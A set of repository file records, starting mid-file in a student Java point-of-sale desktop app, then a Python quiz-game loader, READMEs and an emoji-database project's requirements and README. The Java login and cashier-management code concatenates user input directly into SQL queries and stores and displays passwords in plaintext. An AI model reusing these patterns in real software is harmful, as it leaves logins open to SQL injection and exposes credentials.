mycart_object.qty);\n\n resultset_obj3.updateString(\"totalprice\", mycart_object.totalprice);\n resultset_obj3.insertRow();\n\n }\n JOptionPane.showMessageDialog(rootPane, \"order placed, collect your bill..\");\n getbillprited();\n }\n } catch (SQLException ex) {\n Logger.getLogger(cashierhome.class.getName()).log(Level.SEVERE, null, ex);\n }\n\n\n }//GEN-LAST:event_jButton4ActionPerformed\n\n class carttablemodel extends AbstractTableModel {\n\n @Override\n public int getRowCount() {\n return cart.size();\n }\n\n @Override\n public int getColumnCount() {\n return 6;\n }\n\n @Override\n public Object getValueAt(int i, int j) {\n mycart mycart_object = cart.get(i);\n\n if (j == 0) {\n return mycart_object.srno;\n } else if (j == 1) {\n return mycart_object.pid;\n } else if (j == 2) {\n return mycart_object.pname;\n } else if (j == 3) {\n return mycart_object.price;\n } else if (j == 4) {\n return mycart_object.qty;\n } else if (j == 5) {\n return mycart_object.totalprice;\n } else {\n return null;\n\n }\n\n }\n\n @Override\n public String getColumnName(int j) {\n String col[] = {\"SRNO\", \"PID\", \"Name\", \"Price\", \"Quantity\", \"Total Price\"};\n\n return col[j];\n }\n\n }\n\n void getbillprited() {\n\n try {\n\n PrintService printService = PrinterOutputStream.getPrintServiceByName(\"THERMAL Receipt Printer\");\n PrinterOutputStream printerOutputStream = new PrinterOutputStream(printService);\n EscPos escpos = new EscPos(printerOutputStream);\n Style header = new Style()\n .setFontSize(Style.FontSize._2, Style.FontSize._2)\n .setJustification(EscPosConst.Justification.Center)\n .setBold(true)\n .setColorMode(Style.ColorMode.WhiteOnBlack);\n\n Style address = new Style()\n .setFontName(Style.FontName.Font_A_Default)\n .setFontSize(Style.FontSize._1, Style.FontSize._1)\n .setJustification(EscPosConst.Justification.Center);\n escpos.writeLF(header, \"Point of Sale\");\n escpos.writeLF(address, \"SCO-108, Ranjeet Avenue\");\n escpos.writeLF(address, \"+918725983606\");\n escpos.writeLF(address, \"GSTIN : 23AADGS334SDZDT\");\n escpos.writeLF(address, \"Vat No : 94832848349\");\n escpos.writeLF(address, new Date() + \"\");\n// escpos.writeLF(address, \"Table No. 120\");\n escpos.writeLF(address, \" \");\n escpos.writeLF(address, \" \");\n\n// QRCode qrCode = new QRCode()\n// .setSize(5)\n// .setModel(QRCode.QRModel._2)\n// .setJustification(EscPosConst.Justification.Center);\n//\n// escpos.write(qrCode, \"QR Code\");\n//\n// escpos.writeLF(address, \" \");\n// BarCode barcode = new BarCode();\n// barcode.setJustification(EscPosConst.Justification.Center);\n// barcode.setHRIPosition(BarCode.BarCodeHRIPosition.BelowBarCode);\n// escpos.write(barcode, tfbarcode.getText());\n// GraphicsImageWrapper imageWrapper = new GraphicsImageWrapper();\n// imageWrapper.setJustification(EscPosConst.Justification.Center);\n// \n// BitonalThreshold bod = new BitonalThreshold();\n// BufferedImage bimg = ImageIO.read(new File(\"src/images/goku.png\"));\n// EscPosImage escPos = new EscPosImage(bimg, bod);\n// escpos.write(imageWrapper, escPos);\n//\n//// BitonalThreshold bt = new BitonalThreshold();\n Style lineStyle = new Style()\n .setFontSize(Style.FontSize._1, Style.FontSize._1)\n .setJustification(EscPosConst.Justification.Center);\n\n Style rightText = new Style()\n .setFontSize(Style.FontSize._1, Style.FontSize._1)\n .setJustification(EscPosConst.Justification.Right);\n\n Style leftText = new Style()\n .setFontSize(Style.FontSize._1, Style.FontSize._1)\n .setJustification(EscPosConst.Justification.Left_Default)\n .resetLineSpacing();\n Style justifiedText = new Style()\n .setFontSize(Style.FontSize._1, Style.FontSize._1)\n .setJustification(EscPosConst.Justification.Center);\n\n escpos.writeLF(rightText, \"Bill No : \" + global_bid);\n escpos.writeLF(leftText, \"Cashier: casher1\");\n\n escpos.writeLF(lineStyle, \"----------------------------------------\");\n escpos.writeLF(\"Item Rate Qty Price\");\n System.out.println(\"Item Rate Qty Price\");\n escpos.writeLF(lineStyle, \"----------------------------------------\");\n for (int i = 0; i < cart.size(); i++) {\n\n String name = cart.get(i).pname;\n\n if (name.length() == 6) {\n name = name + \" \";\n } else if (name.length() == 7) {\n name = name + \" \";\n } else if (name.length() == 8) {\n\n name = name + \" \";\n\n } else if (name.length() == 9) {\n name = name + \" \";\n } else if (name.length() == 10) {\n name = name + \" \";\n } else if (name.length() == 11) {\n name = name + \" \";\n } else if (name.length() == 12) {\n name = name + \" \";\n } else if (name.length() == 13) {\n name = name + \" \";\n } else if (name.length() == 14) {\n name = name + \" \";\n } else if (name.length() == 15) {\n name = name + \" \";\n } else if (name.length() == 16) {\n name = name + \" \";\n } else if (name.length() == 17) {\n name = name + \" \";\n } else if (name.length() == 18) {\n name = name + \" \";\n } else {\n name = name + \" \";\n }\n\n escpos.write(leftText, name + \"\" + cart.get(i) + \" \" + cart.get(i).qty + \" \" + cart.get(i).totalprice);\n\n escpos.writeLF(\"\");\n\n System.out.print(cart.get(i).pname);\n System.out.print(cart.get(i).price + \" \" + cart.get(i).qty + \" \" + cart.get(i).totalprice);\n System.out.println(\"\");\n }\n escpos.writeLF(lineStyle, \"----------------------------------------\");\n escpos.write(justifiedText, \"Net Payable: \" + lb_amount.getText());\n\n// Style justifiedText = new Style()\n// .setFontSize(Style.FontSize._1, Style.FontSize._1)\n// .setJustification(EscPosConst.Justification.Left_Default);\n escpos.feed(5);\n escpos.cut(EscPos.CutMode.PART);\n escpos.close();\n\n } catch (Exception e) {\n System.out.println(e.getMessage());\n }\n }\n\n /**\n * @param args the command line arguments\n */\n public static void main(String args[]) {\n /* Set the Nimbus look and feel */\n //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n */\n try {\n for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n if (\"Nimbus\".equals(info.getName())) {\n javax.swing.UIManager.setLookAndFeel(info.getClassName());\n break;\n }\n }\n } catch (ClassNotFoundException ex) {\n java.util.logging.Logger.getLogger(cashierhome.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (InstantiationException ex) {\n java.util.logging.Logger.getLogger(cashierhome.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (IllegalAccessException ex) {\n java.util.logging.Logger.getLogger(cashierhome.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n java.util.logging.Logger.getLogger(cashierhome.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n }\n //</editor-fold>\n\n /* Create and display the form */\n java.awt.EventQueue.invokeLater(new Runnable() {\n public void run() {\n new cashierhome().setVisible(true);\n }\n });\n }\n\n // Variables declaration - do not modify//GEN-BEGIN:variables\n private javax.swing.JButton jButton1;\n private javax.swing.JButton jButton2;\n private javax.swing.JButton jButton3;\n private javax.swing.JButton jButton4;\n private javax.swing.JLabel jLabel1;\n private javax.swing.JLabel jLabel2;\n private javax.swing.JLabel jLabel6;\n private javax.swing.JLabel jLabel7;\n private javax.swing.JPanel jPanel1;\n private javax.swing.JScrollPane jScrollPane1;\n private javax.swing.JTable jTable1;\n private javax.swing.JLabel lb_amount;\n private javax.swing.JLabel lb_pid;\n private javax.swing.JLabel lb_product_category;\n private javax.swing.JLabel lb_product_name;\n private javax.swing.JLabel lb_product_photo;\n private javax.swing.JLabel lb_product_price;\n private javax.swing.JTextField tf_mobile;\n private javax.swing.JTextField tf_net_total;\n private javax.swing.JTextField tf_product_code;\n private javax.swing.JTextField tf_quantity;\n // End of variables declaration//GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.698630154132843,
"alphanum_fraction": 0.7465753555297852,
"avg_line_length": 15.222222328186035,
"blob_id": "2676825923a7c6f3ee95bef34b1d1f1d08bc98d6",
"content_id": "ea1c9179e41ef3dee3b9a616d662f5717b6d4491",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 146,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 9,
"path": "/README.md",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "# personal-projects\n\nProjects done in summer of 2018\n\n1: Point of sale in java\n\n2: Who wants to be a millionare in python\n\n3: Team Viewer in java\n"
},
{
"alpha_fraction": 0.807692289352417,
"alphanum_fraction": 0.807692289352417,
"avg_line_length": 103,
"blob_id": "3c309a43e6efe1c1bf3f6f84a9f7ad027dfd7631",
"content_id": "2c5b7226f6fa3569018d480ace3579440472728a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 312,
"license_type": "no_license",
"max_line_length": 294,
"num_lines": 3,
"path": "/Point_Of_Sale-in_java/README.md",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "# Point_Of_Sale\n\nPoint of Sale in Java. Via this desktop app the merchant calculates the amount owed by the customer, indicates that amount, may prepare an invoice for the customer. User can save information regarding product, categories, client information and can print out a bill when client is done shopping\n"
},
{
"alpha_fraction": 0.553998589515686,
"alphanum_fraction": 0.5664048790931702,
"avg_line_length": 31.85337257385254,
"blob_id": "10ce0bee86d72c2804842127c1d8aa6a62f15c87",
"content_id": "26449e5c1a4ceff1c7bfbbdd9864863f824d3f2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 11204,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 341,
"path": "/Point_Of_Sale-in_java/src/cashier.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport java.io.File;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.ArrayList;\nimport java.util.Date;\nimport java.util.logging.Level;\nimport java.util.logging.Logger;\nimport javax.swing.JOptionPane;\nimport javax.swing.table.AbstractTableModel;\n\n/*\n * To change this license header, choose License Headers in Project Properties.\n * To change this template file, choose Tools | Templates\n * and open the template in the editor.\n */\n\n/**\n *\n * @author vedantmahajan\n */\npublic class cashier extends javax.swing.JFrame {\n\n /**\n * Creates new form cashier\n */\n \n ArrayList<cashierinfo> cashierList = new ArrayList<>();\n \n cashiertablemodel cashiertablemodel_obj;\n \n public cashier() {\n initComponents();\n \n cashiertablemodel_obj = new cashiertablemodel();\n \n jTable1.setModel(cashiertablemodel_obj);\n \n getcashier();\n }\n \n \n public void getcashier()\n {\n ResultSet resultset_obj = DBLoader.executeQuery(\"select * from cashier\");\n \n try {\n while(resultset_obj.next())\n {\n cashierList.add(new cashierinfo(resultset_obj.getInt(\"CID\") , resultset_obj.getString(\"Username\"), resultset_obj.getString(\"Password\")));\n \n jTable1.setRowHeight(100);\n \n cashiertablemodel_obj.fireTableDataChanged();\n \n }\n } \n \n catch (SQLException ex) {\n Logger.getLogger(cashier.class.getName()).log(Level.SEVERE, null, ex);\n }\n \n \n }\n\n /**\n * This method is called from within the constructor to initialize the form.\n * WARNING: Do NOT modify this code. The content of this method is always\n * regenerated by the Form Editor.\n */\n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jLabel1 = new javax.swing.JLabel();\n jLabel2 = new javax.swing.JLabel();\n tf_cashier_username = new javax.swing.JTextField();\n jLabel3 = new javax.swing.JLabel();\n tf_cashier_pass = new javax.swing.JTextField();\n jButton1 = new javax.swing.JButton();\n jScrollPane1 = new javax.swing.JScrollPane();\n jTable1 = new javax.swing.JTable();\n jButton2 = new javax.swing.JButton();\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n getContentPane().setLayout(null);\n\n jLabel1.setText(\"NEW CASHIER\");\n getContentPane().add(jLabel1);\n jLabel1.setBounds(70, 30, 170, 50);\n\n jLabel2.setText(\"USERNAME :\");\n getContentPane().add(jLabel2);\n jLabel2.setBounds(20, 110, 110, 16);\n\n tf_cashier_username.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n tf_cashier_usernameActionPerformed(evt);\n }\n });\n getContentPane().add(tf_cashier_username);\n tf_cashier_username.setBounds(160, 100, 90, 26);\n\n jLabel3.setText(\"PASSWORD :\");\n getContentPane().add(jLabel3);\n jLabel3.setBounds(20, 190, 100, 16);\n\n tf_cashier_pass.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n tf_cashier_passActionPerformed(evt);\n }\n });\n getContentPane().add(tf_cashier_pass);\n tf_cashier_pass.setBounds(160, 180, 90, 26);\n\n jButton1.setText(\"ADD\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(80, 260, 75, 29);\n\n jTable1.setModel(new javax.swing.table.DefaultTableModel(\n new Object [][] {\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null}\n },\n new String [] {\n \"Title 1\", \"Title 2\", \"Title 3\", \"Title 4\"\n }\n ));\n jScrollPane1.setViewportView(jTable1);\n\n getContentPane().add(jScrollPane1);\n jScrollPane1.setBounds(460, 50, 360, 340);\n\n jButton2.setText(\"DELETE\");\n jButton2.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton2ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton2);\n jButton2.setBounds(620, 420, 90, 29);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void tf_cashier_usernameActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_tf_cashier_usernameActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_tf_cashier_usernameActionPerformed\n\n private void tf_cashier_passActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_tf_cashier_passActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_tf_cashier_passActionPerformed\n\n private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n \n if((tf_cashier_username.getText() == null) || (tf_cashier_pass.getText() == null))\n {\n JOptionPane.showMessageDialog(rootPane, \"ALL FIELDS ARE NECESSARY !\");\n }\n else\n {\n \n try\n {\n ResultSet resultset_obj = DBLoader.executeQuery(\"select * from cashier where Username='\"+tf_cashier_username.getText()+\"'\");\n \n if(resultset_obj.next())\n {\n \n JOptionPane.showMessageDialog(rootPane, \"Cashier already exists\");\n \n }\n else\n {\n \n resultset_obj.moveToInsertRow();\n \n resultset_obj.updateString(\"Username\", tf_cashier_username.getText());\n \n resultset_obj.updateString(\"Password\", tf_cashier_pass.getText());\n \n resultset_obj.insertRow();\n \n JOptionPane.showMessageDialog(rootPane, \"DATA ENTRY SUCCESSFUL !\");\n \n }\n \n cashierList.clear();\n// \n getcashier();\n \n \n }\n catch(Exception e)\n {\n e.printStackTrace();\n }\n \n }\n \n }//GEN-LAST:event_jButton1ActionPerformed\n\n private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton2ActionPerformed\n \n \n int rowselected = jTable1.getSelectedRow();\n \n if(rowselected < 0)\n {\n JOptionPane.showMessageDialog(rootPane, \"No Row Selected !\");\n }\n else\n {\n String nameselected = cashierList.get(rowselected).cashier_username;\n \n ResultSet resultset_obj = DBLoader.executeQuery(\"select * from cashier where Username='\"+ nameselected +\"'\");\n \n try \n {\n resultset_obj.next();\n \n resultset_obj.deleteRow();\n } \n catch (SQLException ex) \n {\n Logger.getLogger(cashier.class.getName()).log(Level.SEVERE, null, ex);\n }\n \n cashierList.clear();\n \n getcashier();\n }\n \n \n }//GEN-LAST:event_jButton2ActionPerformed\n\n \n class cashiertablemodel extends AbstractTableModel\n { \n \n @Override\n public int getRowCount()\n {\n return cashierList.size();\n }\n \n @Override\n public int getColumnCount()\n {\n return 3;\n }\n \n @Override\n public Object getValueAt(int i, int j)\n {\n cashierinfo catgoryinfo_object = cashierList.get(i);\n \n if(j==0)\n return catgoryinfo_object.CID;\n \n else if(j==1)\n return catgoryinfo_object.cashier_username;\n \n else if(j==2)\n return catgoryinfo_object.cashier_password;\n \n return null;\n \n }\n \n @Override\n public String getColumnName(int j)\n {\n String col[]={\"CID\",\"Username\",\"Password\"}; \n \n return col[j];\n }\n \n \n } \n \n \n \n \n \n \n \n \n /**\n * @param args the command line arguments\n */\n public static void main(String args[]) {\n /* Set the Nimbus look and feel */\n //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n */\n try {\n for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n if (\"Nimbus\".equals(info.getName())) {\n javax.swing.UIManager.setLookAndFeel(info.getClassName());\n break;\n }\n }\n } catch (ClassNotFoundException ex) {\n java.util.logging.Logger.getLogger(cashier.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (InstantiationException ex) {\n java.util.logging.Logger.getLogger(cashier.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (IllegalAccessException ex) {\n java.util.logging.Logger.getLogger(cashier.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n java.util.logging.Logger.getLogger(cashier.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n }\n //</editor-fold>\n\n /* Create and display the form */\n java.awt.EventQueue.invokeLater(new Runnable() {\n public void run() {\n //new cashier().setVisible(true);\n }\n });\n }\n\n // Variables declaration - do not modify//GEN-BEGIN:variables\n private javax.swing.JButton jButton1;\n private javax.swing.JButton jButton2;\n private javax.swing.JLabel jLabel1;\n private javax.swing.JLabel jLabel2;\n private javax.swing.JLabel jLabel3;\n private javax.swing.JScrollPane jScrollPane1;\n private javax.swing.JTable jTable1;\n private javax.swing.JTextField tf_cashier_pass;\n private javax.swing.JTextField tf_cashier_username;\n // End of variables declaration//GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.5018353462219238,
"alphanum_fraction": 0.5264813899993896,
"avg_line_length": 36.39215850830078,
"blob_id": "5db9fa517b64eca4858310f58c0fed3f0a9f92d3",
"content_id": "4add53b78066139e573e82d71d287b3336f7ce2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1907,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 51,
"path": "/who_wants_to_be_the_millionare/kbc.py",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "from kbc2 import *\nfrom tkinter import *\nfrom tkinter import ttk\nfrom pygame import mixer\nfrom ttkthemes import themed_tk as tk\n\n\nclass kbc:\n def start(self):\n self.progress1[\"value\"] = 0\n self.maxbytes = 100\n self.progress1[\"maximum\"] = 100\n self.read_bytes()\n\n def read_bytes(self):\n '''simulate reading 500 bytes; update progress bar'''\n self.bytes += 1\n abc = \"Loading.... (\" + str(self.bytes) + \"%)\"\n self.lb_blank.config(text=abc)\n self.progress1[\"value\"] = self.bytes\n if self.bytes < self.maxbytes:\n # read more bytes after 100 ms\n self.root.after(250, self.read_bytes)\n else:\n mixer.music.stop()\n self.root.destroy()\n kbc2()\n def __init__(self):\n #self.root = Tk()\n self.root = tk.ThemedTk()\n self.root.get_themes()\n # self.root.set_theme('clam')\n self.root.set_theme('radiance')\n # self.root.geometry(\"{0}x{0}+0+0\".format(self.root.winfo_screenwidth(), self.root.winfo_screenheight()))\n # self.root.resizable(0, 0)\n self.root.attributes('-fullscreen', True)\n mixer.init()\n mixer.music.load('song/Kbc.mp3')\n mixer.music.play()\n self.root.config(background=\"#090035\")\n dp = PhotoImage(file=\"img/kbc_frontlook.png\")\n Label(self.root, image=dp, bg='#090035').pack()\n self.lb_blank = Label(self.root, text=\"\", bg=\"white\")\n self.progress1 = ttk.Progressbar(self.root, orient=\"horizontal\", length=400, mode=\"determinate\")\n self.lb_blank.pack()\n self.progress1.pack()\n self.bytes = 0\n self.start()\n self.root.mainloop()\nif __name__ == '__main__':\n kbc()\n"
},
{
"alpha_fraction": 0.6188653111457825,
"alphanum_fraction": 0.6340062618255615,
"avg_line_length": 37.55704879760742,
"blob_id": "e0efa1655ff6c3270e56cf48052886a642dcb26c",
"content_id": "45d8065e0e53b22ff6d8a81400f7606330c9f308",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 5746,
"license_type": "no_license",
"max_line_length": 176,
"num_lines": 149,
"path": "/Point_Of_Sale-in_java/src/cashierlogin.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.logging.Level;\nimport java.util.logging.Logger;\nimport javax.swing.JOptionPane;\n\n/*\n * To change this license header, choose License Headers in Project Properties.\n * To change this template file, choose Tools | Templates\n * and open the template in the editor.\n */\n\n/**\n *\n * @author vedantmahajan\n */\npublic class cashierlogin extends javax.swing.JFrame {\n\n /**\n * Creates new form cashierlogin\n */\n public cashierlogin() {\n initComponents();\n }\n\n /**\n * This method is called from within the constructor to initialize the form.\n * WARNING: Do NOT modify this code. The content of this method is always\n * regenerated by the Form Editor.\n */\n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jLabel1 = new javax.swing.JLabel();\n jLabel2 = new javax.swing.JLabel();\n jLabel3 = new javax.swing.JLabel();\n tf_cashier_username = new javax.swing.JTextField();\n tf_cashier_pass = new javax.swing.JPasswordField();\n jButton1 = new javax.swing.JButton();\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n getContentPane().setLayout(null);\n\n jLabel1.setText(\"CASHIER LOGIN\");\n getContentPane().add(jLabel1);\n jLabel1.setBounds(120, 30, 170, 30);\n\n jLabel2.setText(\"USERNAME :\");\n getContentPane().add(jLabel2);\n jLabel2.setBounds(30, 100, 76, 16);\n\n jLabel3.setText(\"PASSWORD : \");\n getContentPane().add(jLabel3);\n jLabel3.setBounds(30, 170, 110, 16);\n getContentPane().add(tf_cashier_username);\n tf_cashier_username.setBounds(220, 100, 130, 26);\n\n tf_cashier_pass.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n tf_cashier_passActionPerformed(evt);\n }\n });\n getContentPane().add(tf_cashier_pass);\n tf_cashier_pass.setBounds(220, 160, 130, 26);\n\n jButton1.setText(\"LOGIN\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(120, 240, 84, 29);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void tf_cashier_passActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_tf_cashier_passActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_tf_cashier_passActionPerformed\n\n private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n \n ResultSet resultset_obj = DBLoader.executeQuery(\"select * from cashier where Username='\"+ tf_cashier_username.getText() +\"' and Password='\"+ tf_cashier_pass.getText() +\"'\");\n \n try\n {\n if(resultset_obj.next())\n {\n JOptionPane.showMessageDialog(rootPane, \"Login Successful\");\n }\n \n else\n {\n JOptionPane.showMessageDialog(rootPane, \"Login Failed\");\n }\n } \n catch (SQLException ex) \n {\n Logger.getLogger(cashierlogin.class.getName()).log(Level.SEVERE, null, ex);\n }\n \n }//GEN-LAST:event_jButton1ActionPerformed\n\n /**\n * @param args the command line arguments\n */\n public static void main(String args[]) {\n /* Set the Nimbus look and feel */\n //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n */\n try {\n for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n if (\"Nimbus\".equals(info.getName())) {\n javax.swing.UIManager.setLookAndFeel(info.getClassName());\n break;\n }\n }\n } catch (ClassNotFoundException ex) {\n java.util.logging.Logger.getLogger(cashierlogin.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (InstantiationException ex) {\n java.util.logging.Logger.getLogger(cashierlogin.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (IllegalAccessException ex) {\n java.util.logging.Logger.getLogger(cashierlogin.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n java.util.logging.Logger.getLogger(cashierlogin.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n }\n //</editor-fold>\n\n /* Create and display the form */\n java.awt.EventQueue.invokeLater(new Runnable() {\n public void run() {\n new cashierlogin().setVisible(true);\n }\n });\n }\n\n // Variables declaration - do not modify//GEN-BEGIN:variables\n private javax.swing.JButton jButton1;\n private javax.swing.JLabel jLabel1;\n private javax.swing.JLabel jLabel2;\n private javax.swing.JLabel jLabel3;\n private javax.swing.JPasswordField tf_cashier_pass;\n private javax.swing.JTextField tf_cashier_username;\n // End of variables declaration//GEN-END:variables\n}\n"
}
] | 15 |
rodrigossgithub/populate-emoji-database
|
https://github.com/rodrigossgithub/populate-emoji-database
|
30cbc9463208c9d4287cb30777889e3e8b384d7a
|
d757fc32a97647ec8e8ef8167751a2f4f6824e76
|
c6af12b014e5e21425de1604b6080e5c10003696
|
refs/heads/master
| 2023-05-15T04:34:50.314092 | 2018-03-19T22:40:23 | 2018-03-19T22:40:23 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.48041775822639465,
"alphanum_fraction": 0.707571804523468,
"avg_line_length": 16.409090042114258,
"blob_id": "11c8a05e146a17317d7fb62a0b489d231505a40e",
"content_id": "cb916851d36d270bc2627c35b8c600284b9ed62a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 383,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 22,
"path": "/requirements.txt",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "asn1crypto==0.22.0\nbeautifulsoup4==4.6.0\nbs4==0.0.1\ncertifi==2017.7.27.1\ncffi==1.10.0\nchardet==3.0.4\ncryptography==2.0.3\ndateparser==0.6.0\nidna==2.6\nmysql-connector-python-rf==2.2.2\nndg-httpsclient==0.4.3\npyasn1==0.3.4\npycparser==2.18\npyOpenSSL==17.2.0\npython-dateutil==2.6.1\npytz==2017.2\nregex==2017.7.28\nrequests==2.18.4\nruamel.yaml==0.15.33\nsix==1.10.0\ntzlocal==1.4\nurllib3==1.22\n"
},
{
"alpha_fraction": 0.7710360884666443,
"alphanum_fraction": 0.7756153345108032,
"avg_line_length": 59.930233001708984,
"blob_id": "3744a9b550ce7d6640c22049d0319f6c9c1ad706",
"content_id": "1c52f338ca39245805fbcf9a02ff5f0cc6487a55",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5241,
"license_type": "permissive",
"max_line_length": 585,
"num_lines": 86,
"path": "/README.md",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "# Populate Emoji Database\n\nCode to populate a mysql database with emoji information, including\n* emoji versions\n* codepoints\n* emoji characters\n* emoji_codepoint sequences\n* platforms\n* platform versions\n* emoji renderings\n\n## DATABASE SETUP\nUse the scripts in the database folder to set up the database\nFirst, create a database (if not already created) called emojistudy_db\nThen, while in the database folder,\n\n```\n> source setup_db.sql\n```\n\nOr, you can individually reset the emoji or rendering tables using\n\n```\n> source create_emoji.sql\n> source create_renderings.sql\n```\n\n### Local Config\nOnce the database is set up, you need to create a local configuration to access it\nCreate a file called local_config.py with the following config dictionary (and fill in your credentials)\n\n```\ndb_config = {'user':'',\n 'host':'localhost',\n 'password':'',\n 'database':'emojistudy_db'}\n```\n\nIf needed, refer to the GroupLens Central [Database Management document](https://docs.google.com/a/umn.edu/document/d/1P3_oWjeGX3qMvay1YAtUsAV8mgcIowyx-5O7_0wzrBA/edit?usp=sharing) for information about creating/adding users with database access, etc.\n\n\n## EMOJI DATA\nThis code relies on keeping the emoji_data.py file up-to-date:\n* PLATFORMS\n - This list is the list of platforms you would like to support in your database\n* PLATFORM_VERSIONS\n - This list is the list of platform versions you would like to support in your database\n - This list is created by taking versions from Emojipedia. In general, Emojipedia's naming scheme matches its urls (url = lowercase version name with spaces replaced by '-'). The list of platform versions must be formatted as the version name that follows this url heuristic. If the version name and url do not follow this heuristic, put the version name in the list that suffices the heuristic for the url conversion, then add this version name with the actual version name in the PLATFORM_VERSION_URL_MISMATCH dictionary.\n - This list must be ordered such that all versions for a given platform are consecutive, and in order from most recent to the oldest version\n* Unicode_Emoji_Data\n - This class contains lists for\n * EMOJI_VERSIONS\n * EMOJI_MODIFIERS\n * EMOJI_MODIFIER_BASES\n * EMOJI_COMPONENTS\n * EMOJI\n - To make these lists, I converted the associated js lists from https://github.com/mathiasbynens/unicode-tr51 whose codebase parses the emoji data lists given by the Unicode and generates these lists\n - Need to check this repository/the Unidoce emoji data lists to see if you need to update these 